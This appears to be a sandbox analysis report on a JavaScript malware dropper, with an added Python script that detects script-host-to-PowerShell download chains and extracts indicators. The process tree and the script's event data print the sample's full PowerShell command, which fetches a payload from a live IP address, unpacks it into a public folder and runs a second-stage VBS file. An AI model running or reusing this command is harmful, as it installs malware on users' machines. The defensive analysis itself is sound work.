Analysis
max time kernel: 117s
max time network: 120s
platform: windows7_x64
resource: win7-20231020-en
resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
submitted: 07-12-2023 07:36
Static task: static1
Behavioral task: behavioral1
Sample: fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
Resource: win7-20231020-en (windows7-x64)
4 signatures, 150 seconds
General
Target: fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
Size: 7KB
MD5: b2195fa1ea604007f7a3664e0e49f591
SHA1: 915985302f8fb7f37d07d22a8ec5cb5e8005fb47
SHA256: 8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60
SHA512: 478d9dcd9391a2e224bd291325dde58883d197d4cec1d989a3f054363dc03e19075e174058db828fbfc668cb76e2cd2b73782bbad3cd6a582383a62d37a8b977
SSDEEP: 96:xBdMQYYVlVS+RwbkiEi3gkFmRePXywbkOEi3ckFmRePXuUxBbLDIX3FU3i:qQYYXVS+R9SgbEPihScbEP+cBb+3FGi
Score: 10/10
Malware Config
Extracted
Language: ps1
Source:
URLs:
exe.dropper: http://23.145.120.49:249/js.jpg
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
  pid   process
  2492  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
  description              pid   process
  Token: SeDebugPrivilege  2492  powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  description                        pid   process      target process
  PID 2484 wrote to memory of 2492   2484  wscript.exe  powershell.exe
  PID 2484 wrote to memory of 2492   2484  wscript.exe  powershell.exe
  PID 2484 wrote to memory of 2492   2484  wscript.exe  powershell.exe
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
   - Suspicious use of WriteProcessMemory
   PID: 2484
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2484)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.145.120.49:249/js.jpg' -Destination 'C:\Users\Public\zip.zip'; Expand-Archive -Path 'C:\Users\Public\zip.zip' -DestinationPath 'C:\Users\Public\' -Force;Remove-Item C:\Users\Public\zip.zip; C:\Users\Public\brave.vbs
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2492
      This command line fetches js.jpg over BITS, stores it as zip.zip, expands it into C:\Users\Public, deletes the archive and then invokes C:\Users\Public\brave.vbs. The .jpg name on the server does not match the archive handling that follows, and no child process for brave.vbs appears in this tree, so the command line is the only place the next stage is visible in this run.
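The chain in this tree (a script host spawning PowerShell, a BITS fetch of a file with an image extension that is then expanded as an archive into C:\Users\Public, and a second-stage .vbs named at the end of the command line) is a pattern worth matching in process-creation telemetry. The script below is an added detection example, not part of the sandbox report and not a vendor rule. It runs over constructed events that mirror the tree above (PIDs 2484 and 2492 and the PowerShell command line are taken from the report); the field names pid/ppid/image/cmdline are an assumed generic schema, and the explorer.exe parent (PID 1234) and the benign control event are invented.

```python
"""Flag script-host -> PowerShell download-and-expand chains and pull IoCs.

Added example; not from the sandbox report or any vendor product. Events are
constructed to mirror the report's process tree. Field names are an assumed
generic schema; PID 1234 and the benign control event are invented.
"""
import re
from urllib.parse import urlparse

EVENTS = [
    # Constructed parent for both processes below (not in the report).
    {"pid": 1234, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # From the report: wscript.exe running the sample.
    {"pid": 2484, "ppid": 1234, "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js"},
    # From the report: the PowerShell child and its full command line.
    {"pid": 2492, "ppid": 2484,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.145.120.49:249/js.jpg' -Destination 'C:\Users\Public\zip.zip'; Expand-Archive -Path 'C:\Users\Public\zip.zip' -DestinationPath 'C:\Users\Public\' -Force;Remove-Item C:\Users\Public\zip.zip; C:\Users\Public\brave.vbs'''},
    # Constructed benign control: PowerShell started from explorer, no fetch.
    {"pid": 3000, "ppid": 1234,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
ARCHIVE_EXT = {".zip", ".7z", ".rar", ".cab"}

# Command-line features that get tagged; a *_download tag is required to fire.
TAG_PATTERNS = {
    "bits_download": re.compile(r"Start-BitsTransfer", re.I),
    "web_download": re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadFile|DownloadString", re.I),
    "expand_archive": re.compile(r"Expand-Archive", re.I),
    "cleanup": re.compile(r"Remove-Item|\bdel\s", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
DEST_RE = re.compile(r"-Destination(?:Path)?\s+'?([^\s';]+)", re.I)
# A bare script/binary path as the final statement: the next stage being run.
NEXT_STAGE = re.compile(
    r"[;&|]\s*([A-Za-z]:\\[^\s;&|]+\.(?:vbs|js|jse|wsf|hta|ps1|bat|cmd|exe))\s*$", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ext(path):
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def analyse(events):
    """Return one finding per PowerShell process spawned by a script host
    whose command line downloads something; each finding carries the IoCs."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        cmd = e["cmdline"]
        tags = [t for t, p in TAG_PATTERNS.items() if p.search(cmd)]
        if not any(t.endswith("_download") for t in tags):
            continue  # script host -> PowerShell alone is too noisy on its own
        urls = URL_RE.findall(cmd)
        dests = DEST_RE.findall(cmd)
        stage = NEXT_STAGE.search(cmd)
        # Served as an image, handled as an archive: extension masquerade.
        if any(ext(urlparse(u).path) in IMAGE_EXT for u in urls) and (
                "expand_archive" in tags or any(ext(d) in ARCHIVE_EXT for d in dests)):
            tags.append("extension_mismatch")
        if any(d.lower().startswith(r"c:\users\public") for d in dests):
            tags.append("public_dir_staging")
        findings.append({
            "pid": e["pid"],
            "parent": basename(parent["image"]),
            "urls": urls,
            "hosts": [urlparse(u).netloc for u in urls],
            "destinations": dests,
            "next_stage": stage.group(1) if stage else None,
            "tags": tags,
        })
    return findings


if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f)
```

On the constructed events this yields one finding for PID 2492 with parent wscript.exe, the URL and host:port 23.145.120.49:249, both destination paths, C:\Users\Public\brave.vbs as the next stage, and the tags bits_download, expand_archive, cleanup, extension_mismatch and public_dir_staging; the control PowerShell process is not reported because its parent is not a script host. The host, URL and next-stage path are the values to push into blocklists and hunt queries.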